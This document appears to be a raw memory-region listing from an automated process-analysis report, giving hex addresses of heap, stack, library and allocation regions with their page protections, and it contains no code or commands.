24AAE9CD000
heap
page read and write
7FFC0FA63000
unkown
page readonly
2833858E000
heap
page read and write
21CA2241000
trusted library allocation
page read and write
21CA2169000
trusted library allocation
page read and write
24AAE08A000
heap
page read and write
20561757000
heap
page read and write
7FFC12EC1000
unkown
page execute read
24AAE861000
heap
page read and write
24AAE9CF000
heap
page read and write
7FFC0FA89000
unkown
page readonly
21C9F72E000
heap
page read and write
2055F360000
direct allocation
page read and write
216AF7BC000
trusted library allocation
page read and write
2B1B7C5C000
heap
page read and write
7FFC12E96000
unkown
page readonly
216C6BF1000
heap
page read and write
EEFA7FE000
stack
page read and write
242AD200000
heap
page read and write
21CB97E0000
heap
page read and write
D930B0D000
stack
page read and write
7FFC1ED81000
unkown
page execute read
BEF137B000
stack
page read and write
20561716000
heap
page read and write
7FF6A42DC000
unkown
page write copy
21CB9810000
trusted library allocation
page read and write
20BEEC3A000
heap
page read and write
2055F2F0000
heap
page read and write
BEF1B7C000
stack
page read and write
21CA0FC0000
trusted library allocation
page read and write
24AAE010000
heap
page read and write
24AAE069000
heap
page read and write
2055F9A1000
heap
page read and write
7FFC12EB0000
unkown
page readonly
7FFC12EA4000
unkown
page readonly
283385E5000
heap
page read and write
7FFBABCC0000
trusted library allocation
page read and write
242AD204000
heap
page read and write
7FFBABD00000
trusted library allocation
page read and write
205617C7000
heap
page read and write
7FFC1ED73000
unkown
page readonly
21CA21FF000
trusted library allocation
page read and write
7FFBABC50000
trusted library allocation
page read and write
24AAE8CB000
heap
page read and write
216AE793000
trusted library allocation
page read and write
216C6BE2000
heap
page read and write
7FFBABBB0000
trusted library allocation
page execute and read and write
7FFC1ED97000
unkown
page readonly
28338429000
heap
page read and write
BCF067F000
stack
page read and write
7FF79BF25000
unkown
page readonly
7FFC12F50000
unkown
page readonly
24AAE8CB000
heap
page read and write
D5AF4F9000
stack
page read and write
24AAE08C000
heap
page read and write
2B1B7C83000
heap
page read and write
24AAE278000
heap
page read and write
216C6A00000
trusted library allocation
page read and write
216AF683000
trusted library allocation
page read and write
7FFBAB993000
trusted library allocation
page read and write
FA07EF8000
stack
page read and write
7FFC11E81000
unkown
page execute read
21C9F74C000
heap
page read and write
F2028FE000
stack
page read and write
21CB97F0000
trusted library allocation
page read and write
24AAE0A8000
heap
page read and write
77E37FD000
stack
page read and write
7FFBABC10000
trusted library allocation
page read and write
24AAE8EF000
heap
page read and write
24AAE9D1000
heap
page read and write
24AAE1C7000
heap
page read and write
7FFC12EF3000
unkown
page readonly
D92FA7A000
stack
page read and write
21C9F610000
heap
page read and write
2055F982000
heap
page read and write
24AAE733000
heap
page read and write
21CB9820000
remote allocation
page read and write
24AAE9EF000
heap
page read and write
24AAE07F000
heap
page read and write
28F30613000
heap
page read and write
28338494000
heap
page read and write
22289402000
trusted library allocation
page read and write
24AAE07A000
heap
page read and write
24AAE9CB000
heap
page read and write
216AF5F1000
trusted library allocation
page read and write
7FFBABC30000
trusted library allocation
page read and write
7FFC12E41000
unkown
page read and write
24AAE9EF000
heap
page read and write
D5AF5FC000
stack
page read and write
7FFC12E50000
unkown
page readonly
24AAE1C4000
heap
page read and write
2B1B7C00000
heap
page read and write
216AF66E000
trusted library allocation
page read and write
216AF849000
trusted library allocation
page read and write
22658302000
heap
page read and write
216AF70C000
trusted library allocation
page read and write
21CA30D5000
trusted library allocation
page read and write
216C68C2000
heap
page read and write
24AB34A2000
trusted library allocation
page read and write
24AAE09B000
heap
page read and write
205613F0000
direct allocation
page read and write
9ACDAFF000
stack
page read and write
7FFC0FF08000
unkown
page write copy
24AAE856000
heap
page read and write
F202DFE000
stack
page read and write
2B1B7C62000
heap
page read and write
7FFC0FD44000
unkown
page readonly
F202CFF000
stack
page read and write
24AAE880000
heap
page read and write
2055F33F000
heap
page read and write
216AF7C2000
trusted library allocation
page read and write
24AAE864000
heap
page read and write
24AAE957000
heap
page read and write
21CA1481000
trusted library allocation
page read and write
24AAD680000
heap
page read and write
21CB98E2000
heap
page read and write
24AAE8EF000
heap
page read and write
24AAE013000
heap
page read and write
24AAE083000
heap
page read and write
21CA30E2000
trusted library allocation
page read and write
24AAE083000
heap
page read and write
7FF6A42B0000
unkown
page readonly
D93084E000
stack
page read and write
216C67E5000
heap
page read and write
21CB9810000
trusted library allocation
page read and write
1D34BE79000
heap
page read and write
216C685A000
heap
page read and write
21CB968D000
heap
page read and write
7FFC13010000
unkown
page readonly
216AF5F4000
trusted library allocation
page read and write
21CA1440000
heap
page execute and read and write
7FFBAB98D000
trusted library allocation
page execute and read and write
216AF686000
trusted library allocation
page read and write
7FFC12081000
unkown
page execute read
216C6824000
heap
page read and write
24AAE27E000
heap
page read and write
216C6BFE000
heap
page read and write
22658110000
trusted library allocation
page read and write
216AE701000
trusted library allocation
page read and write
7FFBABB90000
trusted library allocation
page read and write
7FF79BBC1000
unkown
page execute read
2055FA30000
direct allocation
page read and write
24AAE8EF000
heap
page read and write
2055F7B0000
direct allocation
page read and write
205617B6000
heap
page read and write
24AAE07F000
heap
page read and write
21CB9814000
trusted library allocation
page read and write
7FFC0F7C1000
unkown
page execute read
7FFC0FE39000
unkown
page readonly
24AAE073000
heap
page read and write
24AAE794000
heap
page read and write
24AAE99E000
heap
page read and write
24AAE04F000
heap
page read and write
7FFC0F771000
unkown
page readonly
216C6889000
heap
page read and write
2055FBA0000
direct allocation
page read and write
216AF7AA000
trusted library allocation
page read and write
24AAE20F000
heap
page read and write
24AAE083000
heap
page read and write
77E387D000
stack
page read and write
24AAE9A4000
heap
page read and write
216C6BEF000
heap
page read and write
24AAE8B1000
heap
page read and write
24AAE831000
heap
page read and write
7FFC12EE4000
unkown
page read and write
7FF6A42B1000
unkown
page execute read
21C9F772000
heap
page read and write
216AF7B0000
trusted library allocation
page read and write
216AF5EB000
trusted library allocation
page read and write
216AE710000
trusted library allocation
page read and write
2055F300000
heap
page read and write
24AAE927000
heap
page read and write
D92FAF7000
stack
page read and write
28F30666000
heap
page read and write
216BE740000
trusted library allocation
page read and write
216C6837000
heap
page read and write
24AAE831000
heap
page read and write
24AAE9CD000
heap
page read and write
23F98602000
trusted library allocation
page read and write
24AAE7F8000
heap
page read and write
2DF6D314000
heap
page read and write
24AAEF20000
trusted library allocation
page read and write
2056165E000
heap
page read and write
28F306EA000
heap
page read and write
2B1B72E000
stack
page read and write
205617C7000
heap
page read and write
2265825B000
heap
page read and write
216C6854000
heap
page read and write
8FDEDFE000
stack
page read and write
24AAE75C000
heap
page read and write
7FFC120A4000
unkown
page readonly
24AAE880000
heap
page read and write
24AAE072000
heap
page read and write
216BE731000
trusted library allocation
page read and write
216AC84F000
heap
page read and write
2B1B7C5E000
heap
page read and write
21CA21EA000
trusted library allocation
page read and write
21CA223F000
trusted library allocation
page read and write
77E3D3B000
stack
page read and write
28338DC7000
heap
page read and write
216C6BA7000
heap
page read and write
22288BE0000
heap
page read and write
20BEF402000
trusted library allocation
page read and write
7FFC1E0B1000
unkown
page execute read
22657FB0000
heap
page read and write
216B015F000
trusted library allocation
page read and write
216AE1B0000
heap
page read and write
2055F210000
heap
page read and write
24AAE9C5000
heap
page read and write
22288C29000
heap
page read and write
7FFC12072000
unkown
page readonly
2B1B7C74000
heap
page read and write
24AAE9DE000
heap
page read and write
216AF866000
trusted library allocation
page read and write
216AF67D000
trusted library allocation
page read and write
216C67C0000
trusted library allocation
page read and write
21CA2196000
trusted library allocation
page read and write
216AF89C000
trusted library allocation
page read and write
28338210000
heap
page read and write
216C67C0000
trusted library allocation
page read and write
BCF0779000
stack
page read and write
24AAE08B000
heap
page read and write
216AF7B3000
trusted library allocation
page read and write
7FFC12EA6000
unkown
page readonly
24AAE9EF000
heap
page read and write
7FFC11FA0000
unkown
page readonly
1D34BE57000
heap
page read and write
24AAE8CB000
heap
page read and write
7FFBABBB5000
trusted library allocation
page read and write
7FFBABB7D000
trusted library allocation
page read and write
24AAE75F000
heap
page read and write
2DF6D2D0000
heap
page read and write
216C67C0000
trusted library allocation
page read and write
8EB9F7A000
stack
page read and write
216AE704000
trusted library allocation
page read and write
20561736000
heap
page read and write
77E3CBF000
stack
page read and write
21C9F6D0000
trusted library allocation
page read and write
1D34BE24000
heap
page read and write
24AAE06A000
heap
page read and write
D92FC7E000
stack
page read and write
BCF087F000
stack
page read and write
24AAE9C3000
heap
page read and write
7FFC0FF50000
unkown
page readonly
7FFC12F25000
unkown
page read and write
24AAE20A000
heap
page read and write
D5AF8FE000
stack
page read and write
7FFC21E12000
unkown
page readonly
24AAE9EA000
heap
page read and write
7FFC12ED0000
unkown
page readonly
23F97E02000
heap
page read and write
24AAE9CF000
heap
page read and write
8FDECFF000
stack
page read and write
21CB9810000
trusted library allocation
page read and write
1D34BD10000
heap
page read and write
7FFC0FF29000
unkown
page read and write
7FFC12EB5000
unkown
page readonly
216AF66B000
trusted library allocation
page read and write
21CB9813000
trusted library allocation
page read and write
21CA2247000
trusted library allocation
page read and write
205617C7000
heap
page read and write
24AAE04F000
heap
page read and write
24AAE9B5000
heap
page read and write
21CB9810000
trusted library allocation
page read and write
216C68AB000
heap
page read and write
20562270000
direct allocation
page read and write
216C688D000
heap
page read and write
7DF47FDA0000
trusted library allocation
page execute and read and write
7FFC12ED1000
unkown
page execute read
24AAE8CB000
heap
page read and write
242AB5CA000
heap
page read and write
D92F8FE000
stack
page read and write
216AF889000
trusted library allocation
page read and write
77E39FE000
stack
page read and write
24AAE180000
remote allocation
page read and write
8FDE8FE000
stack
page read and write
FA084FB000
stack
page read and write
20561390000
direct allocation
page read and write
23F98550000
remote allocation
page read and write
24AAE9CF000
heap
page read and write
2B1ADBE000
stack
page read and write
24AAE08C000
heap
page read and write
216AE5D7000
heap
page read and write
24AAE07F000
heap
page read and write
2055F9C2000
heap
page read and write
216C68D8000
heap
page read and write
242AB64D000
heap
page read and write
7FFBABB74000
trusted library allocation
page read and write
2055F953000
heap
page read and write
7FFC120D1000
unkown
page readonly
21C9F4B0000
heap
page read and write
7FFC12EF0000
unkown
page readonly
205617DA000
heap
page read and write
216AF70F000
trusted library allocation
page read and write
20561760000
heap
page read and write
242AB638000
heap
page read and write
24AAE8CB000
heap
page read and write
7FFC12E51000
unkown
page execute read
300B67C000
stack
page read and write
7FFC13011000
unkown
page execute read
21CB95E9000
heap
page read and write
24AAE1E6000
heap
page read and write
F20297E000
stack
page read and write
24AAE8C8000
heap
page read and write
24AAE95D000
heap
page read and write
205617F0000
direct allocation
page read and write
8FDE7FD000
stack
page read and write
24AAE9B5000
heap
page read and write
D5AF3FE000
stack
page read and write
20BEEBF0000
trusted library allocation
page read and write
24AAE9B8000
heap
page read and write
2DF6D450000
heap
page read and write
2833842C000
heap
page read and write
24AAE9D1000
heap
page read and write
216C6BE3000
heap
page read and write
216AF68F000
trusted library allocation
page read and write
2B1B7B50000
heap
page read and write
24AAE72E000
heap
page read and write
300ACCB000
stack
page read and write
7FFC12E39000
unkown
page readonly
2DF6ECC4000
heap
page read and write
24AAE9E4000
heap
page read and write
216C67C0000
trusted library allocation
page read and write
24AAE962000
heap
page read and write
242AB63B000
heap
page read and write
8EB9E79000
stack
page read and write
2055F460000
heap
page read and write
216B03B9000
trusted library allocation
page read and write
7FFC12042000
unkown
page execute read
216C68B8000
heap
page read and write
2055F952000
heap
page read and write
216AC7A3000
heap
page read and write
24AAE9CB000
heap
page read and write
216B03AA000
trusted library allocation
page read and write
24AAE929000
heap
page read and write
216AF68C000
trusted library allocation
page read and write
7FFC0FAAE000
unkown
page readonly
242AB789000
heap
page read and write
7FFC11FD1000
unkown
page execute read
7FFBAB9D0000
trusted library allocation
page read and write
22658130000
trusted library allocation
page read and write
28338E02000
heap
page read and write
205622B0000
direct allocation
page read and write
216AF8CF000
trusted library allocation
page read and write
EEFAC7D000
stack
page read and write
24AAE093000
heap
page read and write
24AAE04F000
heap
page read and write
24AAE91E000
heap
page read and write
7FFC12F75000
unkown
page read and write
7FFC12F30000
unkown
page readonly
24AAE7D2000
heap
page read and write
24AAE27E000
heap
page read and write
7FFC12EE5000
unkown
page readonly
22658265000
heap
page read and write
7FFC0FF23000
unkown
page write copy
7FFC12EC3000
unkown
page readonly
216C6BC3000
heap
page read and write
216C6813000
heap
page read and write
2056166B000
heap
page read and write
21CB1490000
trusted library allocation
page read and write
2055F9B8000
heap
page read and write
24AAE9CD000
heap
page read and write
2DF6D1E0000
heap
page read and write
7FFC0F641000
unkown
page execute read
21CB9881000
heap
page read and write
20561675000
heap
page read and write
2B1B7BF0000
trusted library allocation
page read and write
24AAE9C9000
heap
page read and write
216C6D90000
heap
page read and write
7FFBABB3D000
trusted library allocation
page read and write
2DF6ECA4000
heap
page read and write
8FDE29B000
stack
page read and write
1D34BF00000
heap
page read and write
7FFBABB50000
trusted library allocation
page execute and read and write
7FFBABC20000
trusted library allocation
page read and write
216AF689000
trusted library allocation
page read and write
216B01B7000
trusted library allocation
page read and write
7FFBABB78000
trusted library allocation
page read and write
24AAE721000
heap
page read and write
24AAE180000
heap
page read and write
216AE500000
trusted library allocation
page read and write
7FFC1EC81000
unkown
page execute read
7FFC1209D000
unkown
page read and write
8FDEAFD000
stack
page read and write
21C9F6F0000
heap
page read and write
242AB590000
heap
page read and write
24AAE8C8000
heap
page read and write
24AAE274000
heap
page read and write
216C6BDF000
heap
page read and write
8EB9CFF000
stack
page read and write
7FFC12FE3000
unkown
page readonly
22658284000
heap
page read and write
20561BB0000
direct allocation
page read and write
24AAE8B7000
heap
page read and write
242AB5A4000
heap
page read and write
7FF6A42D0000
unkown
page readonly
7FFC12F26000
unkown
page readonly
2055F9C0000
heap
page read and write
24AAE8B1000
heap
page read and write
24AAE063000
heap
page read and write
21CA2249000
trusted library allocation
page read and write
7FFC12F17000
unkown
page readonly
28F30460000
heap
page read and write
7FFC12EE1000
unkown
page execute read
216AF8C0000
trusted library allocation
page read and write
216C6895000
heap
page read and write
24AAE9C9000
heap
page read and write
24AAE9DE000
heap
page read and write
20BEEC49000
heap
page read and write
21CB9810000
trusted library allocation
page read and write
28F306D0000
heap
page read and write
21CB9483000
heap
page read and write
216AF7B6000
trusted library allocation
page read and write
21CB9607000
heap
page read and write
7FFC12079000
unkown
page readonly
216AF8D2000
trusted library allocation
page read and write
7FFBABAA0000
trusted library allocation
page execute and read and write
7FF79BBC0000
unkown
page readonly
28338D00000
heap
page read and write
24AAE8EF000
heap
page read and write
24AAE9F3000
heap
page read and write
2DF6D319000
heap
page read and write
216AC768000
heap
page read and write
24AAE8C8000
heap
page read and write
205617D2000
heap
page read and write
9ACD9FF000
stack
page read and write
D92F9FE000
stack
page read and write
28F3068B000
heap
page read and write
7FFC12ED2000
unkown
page readonly
2DF6D314000
heap
page read and write
2B1B7C3B000
heap
page read and write
7FFC12FE4000
unkown
page read and write
216AF7A1000
trusted library allocation
page read and write
205620E0000
direct allocation
page read and write
24AAE93F000
heap
page read and write
242AB600000
heap
page read and write
24AAEF25000
trusted library allocation
page read and write
2DF6D2A1000
heap
page read and write
216C68DD000
heap
page read and write
28338DBC000
heap
page read and write
7FFC13021000
unkown
page readonly
7FFC11FA3000
unkown
page readonly
20561720000
heap
page read and write
7FFC12E6B000
unkown
page read and write
7FFC11F8B000
unkown
page readonly
7FFC11E86000
unkown
page readonly
7FFC12EB1000
unkown
page execute read
24AAE180000
remote allocation
page read and write
8FDF0FF000
stack
page read and write
21CA2FD3000
trusted library allocation
page read and write
7FFC120B0000
unkown
page readonly
21CA2166000
trusted library allocation
page read and write
216AF83D000
trusted library allocation
page read and write
24AAE77F000
heap
page read and write
20BEEC00000
heap
page read and write
24AAE7F8000
heap
page read and write
24AAE9C9000
heap
page read and write
21C9F7AC000
heap
page read and write
20561D42000
heap
page read and write
24AAE9D1000
heap
page read and write
7FFBAB9C0000
trusted library allocation
page read and write
7FFBABC40000
trusted library allocation
page read and write
28338443000
heap
page read and write
24AAE9EF000
heap
page read and write
24AAE197000
heap
page read and write
216C68C9000
heap
page read and write
7FFC11E72000
unkown
page read and write
7FFC12F11000
unkown
page execute read
24AAE956000
heap
page read and write
7FFC1E0B0000
unkown
page readonly
7FFC1ED70000
unkown
page readonly
21CB988E000
heap
page read and write
28F30470000
heap
page read and write
216AF8CC000
trusted library allocation
page read and write
205621F0000
direct allocation
page read and write
216C68C8000
heap
page read and write
20561B30000
direct allocation
page read and write
7FFBABA40000
trusted library allocation
page execute and read and write
21CA220B000
trusted library allocation
page read and write
24AAE99F000
heap
page read and write
BEF1FFF000
stack
page read and write
20561757000
heap
page read and write
242AB540000
heap
page read and write
7FFC0FB11000
unkown
page execute read
20562170000
direct allocation
page read and write
216AC84D000
heap
page read and write
216C68A3000
heap
page read and write
7FFC11FB8000
unkown
page readonly
7FFC23C59000
unkown
page readonly
7FFBABA66000
trusted library allocation
page execute and read and write
20561950000
direct allocation
page read and write
7FFC12EB3000
unkown
page readonly
D92F6FE000
stack
page read and write
216AF7AD000
trusted library allocation
page read and write
216AC730000
heap
page read and write
8FDE9FF000
stack
page read and write
77E377F000
stack
page read and write
7FF79BF25000
unkown
page readonly
205617C1000
heap
page read and write
24AAE751000
heap
page read and write
7FFC12FFE000
unkown
page readonly
7FFC1EC85000
unkown
page readonly
2055F420000
direct allocation
page read and write
7FFC0F825000
unkown
page execute read
24AAE755000
heap
page read and write
7FFC0FF0C000
unkown
page write copy
216AF8C9000
trusted library allocation
page read and write
242AD170000
heap
page read and write
205616F5000
heap
page read and write
24AAE9C3000
heap
page read and write
7FFC12ED4000
unkown
page readonly
23F98550000
remote allocation
page read and write
24AAE0A8000
heap
page read and write
24AAE08A000
heap
page read and write
21CB97C0000
heap
page execute and read and write
21CB98B4000
heap
page read and write
7FFC0FDF6000
unkown
page readonly
7FFC23C50000
unkown
page readonly
22289340000
trusted library allocation
page read and write
216AF674000
trusted library allocation
page read and write
2055F9F0000
direct allocation
page read and write
24AAE20A000
heap
page read and write
20BEEC37000
heap
page read and write
7FFBAB9C2000
trusted library allocation
page read and write
24AAE069000
heap
page read and write
22658224000
heap
page read and write
21CA0F90000
trusted library allocation
page read and write
D92F77F000
stack
page read and write
2DF6D250000
heap
page read and write
24AAE180000
remote allocation
page read and write
20561736000
heap
page read and write
300B47E000
stack
page read and write
77E480E000
stack
page read and write
24AAE9A8000
heap
page read and write
7FFBABA36000
trusted library allocation
page read and write
7FFC11FBE000
unkown
page read and write
7FFBABB62000
trusted library allocation
page read and write
22288B80000
heap
page read and write
7FF79BF78000
unkown
page readonly
216AF89E000
trusted library allocation
page read and write
2265824B000
heap
page read and write
24AAE965000
heap
page read and write
24AAE074000
heap
page read and write
7FFBABD10000
trusted library allocation
page read and write
2B1B7C29000
heap
page read and write
24AAE96A000
heap
page read and write
7FFC12EA1000
unkown
page execute read
D9307CE000
stack
page read and write
22288C13000
heap
page read and write
7FFC12F10000
unkown
page readonly
24AAE9BE000
heap
page read and write
216C68CC000
heap
page read and write
216C686A000
heap
page read and write
20561AD0000
direct allocation
page read and write
24AAE9C9000
heap
page read and write
20561D20000
heap
page read and write
7FFC0FF1F000
unkown
page read and write
216AF671000
trusted library allocation
page read and write
7FFC0FF20000
unkown
page write copy
7FFC1EC84000
unkown
page read and write
21CB9820000
trusted library allocation
page read and write
1D34BE64000
heap
page read and write
2B1B7C61000
heap
page read and write
7FFC12FE5000
unkown
page readonly
24AAE8E7000
heap
page read and write
7FFBABCB0000
trusted library allocation
page read and write
7FFC1E0B3000
unkown
page readonly
7FFC0F850000
unkown
page execute read
7FFC12E84000
unkown
page read and write
21CA2151000
trusted library allocation
page read and write
216C69E0000
trusted library allocation
page read and write
226581E0000
remote allocation
page read and write
BEF177C000
stack
page read and write
216AF721000
trusted library allocation
page read and write
7FFBABBF5000
trusted library allocation
page read and write
24AAE96A000
heap
page read and write
20561751000
heap
page read and write
216C67C0000
trusted library allocation
page read and write
24AAE9B5000
heap
page read and write
D5AFBFF000
stack
page read and write
1D34C602000
trusted library allocation
page read and write
21C9F5F0000
heap
page read and write
24AAE08C000
heap
page read and write
21CB98A4000
heap
page read and write
24AAE9F3000
heap
page read and write
24AAE277000
heap
page read and write
20561751000
heap
page read and write
7FFC12F33000
unkown
page readonly
28338270000
heap
page read and write
242AB779000
heap
page read and write
23F98550000
remote allocation
page read and write
24AAE06C000
heap
page read and write
77E38FE000
stack
page read and write
216AC854000
heap
page read and write
24AAE9EF000
heap
page read and write
216C6B80000
heap
page read and write
2055F9B5000
heap
page read and write
216C67A0000
heap
page execute and read and write
FA07FFE000
stack
page read and write
24AAE9C9000
heap
page read and write
24AAE1CF000
heap
page read and write
24AAE9EF000
heap
page read and write
21CB97C0000
trusted library allocation
page read and write
7FFBABBD0000
trusted library allocation
page read and write
21CA3033000
trusted library allocation
page read and write
D5AF6FE000
stack
page read and write
216AF67A000
trusted library allocation
page read and write
21C9F738000
heap
page read and write
21C9F79E000
heap
page read and write
77E36FF000
stack
page read and write
216C6826000
heap
page read and write
24AAE9C5000
heap
page read and write
7FFBABBD0000
trusted library allocation
page read and write
216AE160000
trusted library allocation
page read and write
2055F2D9000
heap
page read and write
7FFBABCA0000
trusted library allocation
page read and write
23F97E5F000
heap
page read and write
7FFC11FA6000
unkown
page readonly
300B57E000
stack
page read and write
24AAE9CB000
heap
page read and write
7FFBABCA0000
trusted library allocation
page read and write
24AAE8C8000
heap
page read and write
7FFC12EE3000
unkown
page readonly
20BEEAA0000
heap
page read and write
24AAE9EF000
heap
page read and write
28338E27000
heap
page read and write
7FF6A42B0000
unkown
page readonly
24AAE9DE000
heap
page read and write
7FFC12916000
unkown
page readonly
7FFC11FA5000
unkown
page read and write
9ACD29C000
stack
page read and write
24AAE074000
heap
page read and write
7FFBABA76000
trusted library allocation
page read and write
2B1B7C58000
heap
page read and write
2056170A000
heap
page read and write
216AF8E7000
trusted library allocation
page read and write
7FFBABC30000
trusted library allocation
page read and write
242AB63B000
heap
page read and write
24AAE9BB000
heap
page read and write
216AF7B9000
trusted library allocation
page read and write
24AAE9C6000
heap
page read and write
D93098F000
stack
page read and write
2B1B7C40000
heap
page read and write
216C68A2000
heap
page read and write
24AAE9CF000
heap
page read and write
23F97DC0000
heap
page read and write
24AAE07F000
heap
page read and write
24AAE9E4000
heap
page read and write
24AAE8CF000
heap
page read and write
2056170A000
heap
page read and write
EEFAA7E000
stack
page read and write
2055F2D2000
heap
page read and write
242AB5CB000
heap
page read and write
20561757000
heap
page read and write
2DF6D4F0000
heap
page read and write
21CA20E0000
trusted library allocation
page read and write
24AAE80C000
heap
page read and write
28F30F13000
heap
page read and write
242AB764000
heap
page read and write
7FFBABC90000
trusted library allocation
page read and write
8EB9BFA000
stack
page read and write
28F305D0000
trusted library allocation
page read and write
216AF709000
trusted library allocation
page read and write
216AC84A000
heap
page read and write
242AB600000
heap
page read and write
20BEEC2F000
heap
page read and write
24AAE953000
heap
page read and write
7FFBABB70000
trusted library allocation
page execute and read and write
20561C40000
direct allocation
page read and write
24AAE7BF000
heap
page read and write
216AC772000
heap
page read and write
24AAE9CD000
heap
page read and write
24AAE892000
heap
page read and write
24AAE9C6000
heap
page read and write
24AAE9B5000
heap
page read and write
22288C3D000
heap
page read and write
21CB9598000
heap
page read and write
300B27F000
stack
page read and write
7FFBABC40000
trusted library allocation
page read and write
216C68BC000
heap
page read and write
24AAE856000
heap
page read and write
24AAE9CF000
heap
page read and write
7FFC120A3000
unkown
page read and write
216C685F000
heap
page read and write
24AAE9A3000
heap
page read and write
216AF71E000
trusted library allocation
page read and write
216AF715000
trusted library allocation
page read and write
D92FBF7000
stack
page read and write
21CB97F0000
trusted library allocation
page read and write
216C6844000
heap
page read and write
24AAE9C5000
heap
page read and write
24AAE9DE000
heap
page read and write
216AF718000
trusted library allocation
page read and write
24AAE9F3000
heap
page read and write
D93090E000
stack
page read and write
23F97DF0000
trusted library allocation
page read and write
24AAE09A000
heap
page read and write
7FFC12F51000
unkown
page execute read
7FFBABC80000
trusted library allocation
page read and write
7FFC11FA1000
unkown
page execute read
7FFC11E6B000
unkown
page readonly
216AF8D5000
trusted library allocation
page read and write
205617D2000
heap
page read and write
7FFC0F85D000
unkown
page execute read
2055F8B0000
direct allocation
page read and write
7FFC0FF45000
unkown
page read and write
216C689D000
heap
page read and write
D5AF7FE000
stack
page read and write
7FFBABD50000
trusted library allocation
page read and write
7FF79BBC0000
unkown
page readonly
216AF703000
trusted library allocation
page read and write
24AAE8C8000
heap
page read and write
24AAE9F3000
heap
page read and write
7FFBAB9DC000
trusted library allocation
page read and write
216C689F000
heap
page read and write
7FFC12E81000
unkown
page execute read
7FFBABCC0000
trusted library allocation
page read and write
28338D22000
heap
page read and write
216AF5E8000
trusted library allocation
page read and write
7FFC12911000
unkown
page execute read
21CA222D000
trusted library allocation
page read and write
205617D4000
heap
page read and write
7FFBABB90000
trusted library allocation
page execute and read and write
7FFC1ED90000
unkown
page readonly
24AAE9BB000
heap
page read and write
D92FB78000
stack
page read and write
24AAE9EF000
heap
page read and write
21CB9851000
heap
page read and write
2055F870000
direct allocation
page read and write
2B1B7C64000
heap
page read and write
216AF852000
trusted library allocation
page read and write
77E494F000
stack
page read and write
7FFBAB983000
trusted library allocation
page execute and read and write
7FF6A42E6000
unkown
page read and write
28338D6F000
heap
page read and write
24AAE9E0000
heap
page read and write
8EBA2FF000
stack
page read and write
7FFC12913000
unkown
page readonly
226581E0000
remote allocation
page read and write
28338463000
heap
page read and write
9ACD8FE000
stack
page read and write
7FFC12E85000
unkown
page readonly
216C67C0000
trusted library allocation
page read and write
24AAE23D000
heap
page read and write
28338E23000
heap
page read and write
24AAE95B000
heap
page read and write
24AAE012000
heap
page read and write
D92F97D000
stack
page read and write
7FFC11FC0000
unkown
page readonly
242AB672000
heap
page read and write
7FFC12E31000
unkown
page execute read
242AD20D000
heap
page read and write
7FFC0F7A1000
unkown
page readonly
242AB8A5000
heap
page read and write
21CA2194000
trusted library allocation
page read and write
8EBA07E000
stack
page read and write
24AAE946000
heap
page read and write
205617B6000
heap
page read and write
7FFC12910000
unkown
page readonly
216B03D6000
trusted library allocation
page read and write
7FFC12EF1000
unkown
page execute read
7FFBABB22000
trusted library allocation
page read and write
216AC760000
heap
page read and write
24AAE782000
heap
page read and write
24AAE09A000
heap
page read and write
21CB9810000
trusted library allocation
page read and write
24AAE7C4000
heap
page read and write
216AE120000
trusted library allocation
page read and write
21CB9800000
trusted library allocation
page read and write
7FFC0FE15000
unkown
page readonly
216AE150000
heap
page readonly
216C6B98000
heap
page read and write
205617C3000
heap
page read and write
24AAE030000
heap
page read and write
7FFC0FAD5000
unkown
page write copy
24AAE799000
heap
page read and write
8FDEEFE000
stack
page read and write
20562090000
direct allocation
page read and write
24AAE08B000
heap
page read and write
7FFC11E74000
unkown
page readonly
20561760000
heap
page read and write
21CA3241000
trusted library allocation
page read and write
22658318000
heap
page read and write
242AB760000
heap
page read and write
216B01C0000
trusted library allocation
page read and write
7FFC12EC0000
unkown
page readonly
24AAE274000
heap
page read and write
7FFC1ED75000
unkown
page readonly
24AAE854000
heap
page read and write
21CB987E000
heap
page read and write
FA081FE000
stack
page read and write
216AF7A4000
trusted library allocation
page read and write
7FFBABC70000
trusted library allocation
page read and write
7FFC23C51000
unkown
page execute read
7FFC1E0B5000
unkown
page readonly
2DF6D306000
heap
page read and write
216AF2B6000
trusted library allocation
page read and write
24AAE77F000
heap
page read and write
28338C02000
heap
page read and write
24AAE880000
heap
page read and write
1D34BE00000
heap
page read and write
24AAE8CB000
heap
page read and write
22658259000
heap
page read and write
7FFBABB31000
trusted library allocation
page read and write
24AAE08C000
heap
page read and write
2055F9C2000
heap
page read and write
216AE140000
trusted library allocation
page read and write
7FFC1206B000
unkown
page read and write
7FFC12FF0000
unkown
page readonly
2055F9C0000
heap
page read and write
D5AF1FE000
stack
page read and write
7FFC0FEE5000
unkown
page read and write
2055F340000
heap
page read and write
2B1B7C5F000
heap
page read and write
21C9F734000
heap
page read and write
24AAE9BB000
heap
page read and write
205616F5000
heap
page read and write
7FFC12F69000
unkown
page readonly
242AD160000
heap
page read and write
7FFC120B1000
unkown
page execute read
7FFC12F04000
unkown
page read and write
2B1B7C6C000
heap
page read and write
2055F0D0000
heap
page read and write
F20287B000
stack
page read and write
7FFBABA3C000
trusted library allocation
page execute and read and write
24AAE748000
heap
page read and write
7FFBABD10000
trusted library allocation
page read and write
216AF8DB000
trusted library allocation
page read and write
24AAE8F5000
heap
page read and write
23F97E00000
heap
page read and write
7FFC0FF22000
unkown
page read and write
7FFC12FE1000
unkown
page execute read
7FFC12F05000
unkown
page readonly
24AAE08E000
heap
page read and write
24AAE8C6000
heap
page read and write
BCF012C000
stack
page read and write
7FFBAB9C3000
trusted library allocation
page execute and read and write
7FFBABC00000
trusted library allocation
page read and write
216C6815000
heap
page read and write
24AAE9C3000
heap
page read and write
2265825B000
heap
page read and write
D92F87D000
stack
page read and write
24AAE9BB000
heap
page read and write
21CB1625000
trusted library allocation
page read and write
7FFC1ED71000
unkown
page execute read
216C67C0000
trusted library allocation
page read and write
24AAE7F8000
heap
page read and write
28F30713000
heap
page read and write
77E488D000
stack
page read and write
24AAE06F000
heap
page read and write
216C6B90000
heap
page read and write
216AF89A000
trusted library allocation
page read and write
24AAE9CF000
heap
page read and write
24AAE07F000
heap
page read and write
7FF79BF78000
unkown
page readonly
21CA1035000
heap
page read and write
20561716000
heap
page read and write
7FFC12E30000
unkown
page readonly
24AAE093000
heap
page read and write
24AAE1C6000
heap
page read and write
FA080FE000
stack
page read and write
24AAE9F3000
heap
page read and write
216AF79B000
trusted library allocation
page read and write
24AAE8C8000
heap
page read and write
216AF5EE000
trusted library allocation
page read and write
21CA2225000
trusted library allocation
page read and write
242AB8A0000
heap
page read and write
216B019A000
trusted library allocation
page read and write
77E4A4C000
stack
